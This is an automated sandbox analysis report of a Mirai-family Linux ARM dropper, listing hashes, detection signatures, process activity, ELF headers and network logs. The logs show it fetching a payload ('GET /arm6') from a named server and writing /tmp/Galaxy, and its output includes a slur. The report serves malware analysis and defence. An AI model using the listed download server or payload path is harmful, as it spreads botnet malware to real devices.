Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
dlr.arm6.elf

Overview

General Information

Sample name:dlr.arm6.elf
Analysis ID:1579198
MD5:2a92c37497b2e076e0b2c19c9a43869c
SHA1:149ae82bea63b4a4354bc67f7f042c7a3b7a800f
SHA256:41da9a17dd8ba3c78f992fcdd6d2118a831f6e114091f0abde08ee969e58e39c
Tags:elfuser-abuse_ch
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Executes the "rm" command used to delete files or directories
HTTP GET or POST without a user agent
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1579198
Start date and time:2024-12-21 04:16:06 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 48s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:dlr.arm6.elf
Detection:MAL
Classification:mal48.linELF@0/1@0/0
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Command:/tmp/dlr.arm6.elf
PID:6250
Exit Code:5
Exit Code Info:
Killed:False
Standard Output:
NIGGY
RAY
Standard Error:
  • system is lnxubuntu20
  • dlr.arm6.elf (PID: 6250, Parent: 6170, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/dlr.arm6.elf
  • dash New Fork (PID: 6255, Parent: 4333)
  • rm (PID: 6255, Parent: 4333, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.TvQvaj4xgW /tmp/tmp.XT3CbeV7Ol /tmp/tmp.5wuaxOy4MS
  • dash New Fork (PID: 6256, Parent: 4333)
  • rm (PID: 6256, Parent: 4333, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.TvQvaj4xgW /tmp/tmp.XT3CbeV7Ol /tmp/tmp.5wuaxOy4MS
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: dlr.arm6.elfReversingLabs: Detection: 44%
Source: global trafficHTTP traffic detected: GET /arm6 HTTP/1.0Data Raw: 00 00 52 41 59 0a 00 00 00 00 00 00 Data Ascii: RAY
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 37.44.238.94
Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: global trafficHTTP traffic detected: GET /arm6 HTTP/1.0Data Raw: 00 00 52 41 59 0a 00 00 00 00 00 00 Data Ascii: RAY
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33606
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 33606 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal48.linELF@0/1@0/0
Source: /usr/bin/dash (PID: 6255)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.TvQvaj4xgW /tmp/tmp.XT3CbeV7Ol /tmp/tmp.5wuaxOy4MSJump to behavior
Source: /usr/bin/dash (PID: 6256)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.TvQvaj4xgW /tmp/tmp.XT3CbeV7Ol /tmp/tmp.5wuaxOy4MSJump to behavior
Source: /tmp/dlr.arm6.elf (PID: 6250)File written: /tmp/GalaxyJump to dropped file
Source: /tmp/dlr.arm6.elf (PID: 6250)Queries kernel information via 'uname': Jump to behavior
Source: dlr.arm6.elf, 6250.1.00007ffd4b1bd000.00007ffd4b1de000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/dlr.arm6.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/dlr.arm6.elf
Source: dlr.arm6.elf, 6250.1.000055e2d95a5000.000055e2d96d3000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
Source: dlr.arm6.elf, 6250.1.000055e2d95a5000.000055e2d96d3000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: dlr.arm6.elf, 6250.1.00007ffd4b1bd000.00007ffd4b1de000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
File Deletion
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579198 Sample: dlr.arm6.elf Startdate: 21/12/2024 Architecture: LINUX Score: 48 15 109.202.202.202, 80 INIT7CH Switzerland 2->15 17 37.44.238.94, 42684, 80 HARMONYHOSTING-ASFR France 2->17 19 3 other IPs or domains 2->19 21 Multi AV Scanner detection for submitted file 2->21 6 dlr.arm6.elf 2->6         started        9 dash rm 2->9         started        11 dash rm 2->11         started        signatures3 process4 file5 13 /tmp/Galaxy, ELF 6->13 dropped

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
dlr.arm6.elf45%ReversingLabsLinux.Backdoor.Mirai
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
37.44.238.94
unknownFrance
49434HARMONYHOSTING-ASFRfalse
54.171.230.55
unknownUnited States
16509AMAZON-02USfalse
109.202.202.202
unknownSwitzerland
13030INIT7CHfalse
91.189.91.43
unknownUnited Kingdom
41231CANONICAL-ASGBfalse
91.189.91.42
unknownUnited Kingdom
41231CANONICAL-ASGBfalse
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
54.171.230.55arm6.elfGet hashmaliciousMiraiBrowse
    http://112.31.189.32:40158Get hashmaliciousMiraiBrowse
      Aqua.mpsl.elfGet hashmaliciousMiraiBrowse
        bot.arm7.elfGet hashmaliciousMirai, OkiruBrowse
          la.bot.arc.elfGet hashmaliciousMiraiBrowse
            armv6l.elfGet hashmaliciousMiraiBrowse
              la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                  hidakibest.x86.elfGet hashmaliciousMirai, GafgytBrowse
                    la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                      109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                      • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                      91.189.91.43mips.elfGet hashmaliciousMiraiBrowse
                        la.bot.arc.elfGet hashmaliciousMiraiBrowse
                          boatnet.i686.elfGet hashmaliciousMiraiBrowse
                            boatnet.x86_64.elfGet hashmaliciousMiraiBrowse
                              boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                  arm6.elfGet hashmaliciousMiraiBrowse
                                    dbus.elfGet hashmaliciousUnknownBrowse
                                      fenty.arm4.elfGet hashmaliciousMiraiBrowse
                                        CONSTANT_STRATEGY.elfGet hashmaliciousSliverBrowse
                                          91.189.91.42mips.elfGet hashmaliciousMiraiBrowse
                                            la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                              boatnet.i686.elfGet hashmaliciousMiraiBrowse
                                                boatnet.x86_64.elfGet hashmaliciousMiraiBrowse
                                                  boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                    boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                      arm6.elfGet hashmaliciousMiraiBrowse
                                                        dbus.elfGet hashmaliciousUnknownBrowse
                                                          fenty.arm4.elfGet hashmaliciousMiraiBrowse
                                                            CONSTANT_STRATEGY.elfGet hashmaliciousSliverBrowse
                                                              No context
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              CANONICAL-ASGBmips.elfGet hashmaliciousMiraiBrowse
                                                              • 91.189.91.42
                                                              la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                              • 91.189.91.42
                                                              boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                              • 185.125.190.26
                                                              boatnet.i686.elfGet hashmaliciousMiraiBrowse
                                                              • 91.189.91.42
                                                              boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                              • 185.125.190.26
                                                              boatnet.x86_64.elfGet hashmaliciousMiraiBrowse
                                                              • 91.189.91.42
                                                              boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                              • 91.189.91.42
                                                              boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                              • 91.189.91.42
                                                              arm6.elfGet hashmaliciousMiraiBrowse
                                                              • 91.189.91.42
                                                              dbus.elfGet hashmaliciousUnknownBrowse
                                                              • 91.189.91.42
                                                              AMAZON-02UShttps://gADK.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/Get hashmaliciousUnknownBrowse
                                                              • 52.210.83.154
                                                              la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                              • 52.53.201.100
                                                              la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                              • 18.146.49.105
                                                              http://aselog24x7.cl/Get hashmaliciousHTMLPhisherBrowse
                                                              • 108.158.75.61
                                                              la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                                              • 44.250.47.247
                                                              la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                              • 34.222.232.192
                                                              la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                              • 54.187.12.59
                                                              la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                              • 13.60.228.219
                                                              la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                              • 3.28.72.74
                                                              la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                              • 3.12.252.94
                                                              INIT7CHmips.elfGet hashmaliciousMiraiBrowse
                                                              • 109.202.202.202
                                                              la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                              • 109.202.202.202
                                                              boatnet.i686.elfGet hashmaliciousMiraiBrowse
                                                              • 109.202.202.202
                                                              boatnet.x86_64.elfGet hashmaliciousMiraiBrowse
                                                              • 109.202.202.202
                                                              boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                              • 109.202.202.202
                                                              boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                              • 109.202.202.202
                                                              arm6.elfGet hashmaliciousMiraiBrowse
                                                              • 109.202.202.202
                                                              dbus.elfGet hashmaliciousUnknownBrowse
                                                              • 109.202.202.202
                                                              fenty.arm4.elfGet hashmaliciousMiraiBrowse
                                                              • 109.202.202.202
                                                              CONSTANT_STRATEGY.elfGet hashmaliciousSliverBrowse
                                                              • 109.202.202.202
                                                              HARMONYHOSTING-ASFR8k1e14tjcx.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 37.44.238.250
                                                              roze.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 37.44.238.73
                                                              roze.armv4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 37.44.238.73
                                                              roze.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 37.44.238.73
                                                              roze.mipsel.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 37.44.238.73
                                                              roze.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 37.44.238.73
                                                              roze.i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 37.44.238.73
                                                              roze.m68k.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 37.44.238.73
                                                              roze.i686.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 37.44.238.73
                                                              roze.armv5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 37.44.238.73
                                                              No context
                                                              No context
                                                              Process:/tmp/dlr.arm6.elf
                                                              File Type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, missing section headers at 88760
                                                              Category:dropped
                                                              Size (bytes):81032
                                                              Entropy (8bit):6.081224700329217
                                                              Encrypted:false
                                                              SSDEEP:1536:zWnjpZpdSHCsbfF5lg9LQJGgfe/aStLPQyMfQiVEB9RK37UY5xYTnj:OZOCAfFfsLQJTfe/aSCEB9RK3QYDYnj
                                                              MD5:09F9CD5C8DFE230BA9E6DE2F29D51BB9
                                                              SHA1:754E458A6E4DF89927D59D25809CB25D73076B70
                                                              SHA-256:51C36D8F98C0A1AD2363AC0B3FE5F1667D5DF19BE248A9F8E4CA7A96A6257583
                                                              SHA-512:8F920C0E40B22633FF9EC7710A79CB051DE1ABB2C2375C67F474B63CA59016D1C9D03592008DB9CA0CBE449991C15B99F8E64424E1CC80DFEF045A458366CBA9
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:.ELF..............(.....T...4....Y......4. ...(......................U...U...............U...U...U......h...........Q.td..................................-...L.................@-.,@...0....S..... 0....S........../..0...0...@..../.X.......U....-.@0....S...M.8...8......../.0....0....S.....$0....S....../........../......U...X...U.................. ... -...-.......-......0..8...3.....<........G-......p.......... `...!....p..0...0....P..P...P....U......G..../..!....p..@........P.....$...#6..!......_".......5..!..: ..l0........P.....`0...........0....S.. ...............0....S...... ....R..........5........... ...0.........../.....X...X....P..@-..@.......0....S.................0....R...............^..............@..../.......P.........; ...@.......O-...Q...M..@...P..........O..../.........!<.. 4...,...4....T.......... ....T.. ............Y......1...`...pD...W....:.........0.......0f...........C.. ... ...0P..pG..0....W..0...@... ..0................W..`...P..=....P....U..`..0...
                                                              File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                              Entropy (8bit):4.843671132119815
                                                              TrID:
                                                              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                              File name:dlr.arm6.elf
                                                              File size:1'444 bytes
                                                              MD5:2a92c37497b2e076e0b2c19c9a43869c
                                                              SHA1:149ae82bea63b4a4354bc67f7f042c7a3b7a800f
                                                              SHA256:41da9a17dd8ba3c78f992fcdd6d2118a831f6e114091f0abde08ee969e58e39c
                                                              SHA512:f3d66c773ddd9c5bcea198a85d9495c517106f47662ba565ff39d24a6fa5c62db9e0613e69907089987907bd447cb704c27bf19484d78c5c4e3605e1b1a969da
                                                              SSDEEP:24:CCKGpa7Urz/jlfanXK1hH9Vev3gRGaJ9iMjBBuplxrR+zDS+ZA:vKGpa7UrLZa8I+JdBuplxrsDS+Z
                                                              TLSH:D731F19163D15FBCCCE4D17E9D56431473649F40E0C77252D218B754BD19EBC9D26046
                                                              File Content Preview:.ELF..............(.........4...........4. ...(.....................<...<...............<...<...<...................Q.td.........................................8...<...4...........(.."...#...../...-.......M.................../...-.......M................

                                                              ELF header

                                                              Class:ELF32
                                                              Data:2's complement, little endian
                                                              Version:1 (current)
                                                              Machine:ARM
                                                              Version Number:0x1
                                                              Type:EXEC (Executable file)
                                                              OS/ABI:UNIX - System V
                                                              ABI Version:0
                                                              Entry Point Address:0x838c
                                                              Flags:0x4000002
                                                              ELF Header Size:52
                                                              Program Header Offset:52
                                                              Program Header Size:32
                                                              Number of Program Headers:3
                                                              Section Header Offset:1164
                                                              Section Header Size:40
                                                              Number of Section Headers:7
                                                              Header String Table Index:6
                                                              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                              NULL0x00x00x00x00x0000
                                                              .textPROGBITS0x80a00xa00x35c0x00x6AX0016
                                                              .rodataPROGBITS0x83fc0x3fc0x400x10x32AMS004
                                                              .gotPROGBITS0x1043c0x43c0xc0x40x3WA004
                                                              .bssNOBITS0x104480x4480x80x00x3WA004
                                                              .ARM.attributesARM_ATTRIBUTES0x00x4480x100x00x0001
                                                              .shstrtabSTRTAB0x00x4580x330x00x0001
                                                              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                              LOAD0x00x80000x80000x43c0x43c5.26270x5R E0x8000.text .rodata
                                                              LOAD0x43c0x1043c0x1043c0xc0x140.00000x6RW 0x8000.got .bss
                                                              GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 21, 2024 04:17:01.708678961 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:01.828507900 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:01.828639984 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:01.829591036 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:01.846604109 CET43928443192.168.2.2391.189.91.42
                                                              Dec 21, 2024 04:17:01.949168921 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.099242926 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.099611044 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.099627972 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.099621058 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.099644899 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.099704981 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.099704981 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.099704981 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.099737883 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.099764109 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.099778891 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.099796057 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.099797010 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.099813938 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.099827051 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.099827051 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.099827051 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.099863052 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.100052118 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.100104094 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.219440937 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.219501019 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.219542980 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.219619036 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.291596889 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.291651964 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.291732073 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.291781902 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.338958979 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.338998079 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.339015961 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.339045048 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.411156893 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.454391003 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.458352089 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.458575010 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.458611965 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.458647966 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.458682060 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.458717108 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.458750963 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.458786011 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.458838940 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.458873987 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.458908081 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.458941936 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.458978891 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.459012032 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.459045887 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.459100008 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.459134102 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.459187984 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.459717035 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.483540058 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.483664989 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.485193968 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.487333059 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.488781929 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.488864899 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.488924026 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.496455908 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.496577024 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.498172045 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.574019909 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.574134111 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.574191093 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.579226017 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.579351902 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.580250025 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.583240032 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.583347082 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.584345102 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.588529110 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.588614941 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.590161085 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.593883038 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.594012976 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.595696926 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.599242926 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.599379063 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.601233959 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.604583025 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.604635954 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.604923964 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.609941959 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.610028982 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.610459089 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.615286112 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.615408897 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.616096020 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.620611906 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.620734930 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.621695042 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.694993019 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.695099115 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.696866035 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.697659016 CET804268437.44.238.94192.168.2.23
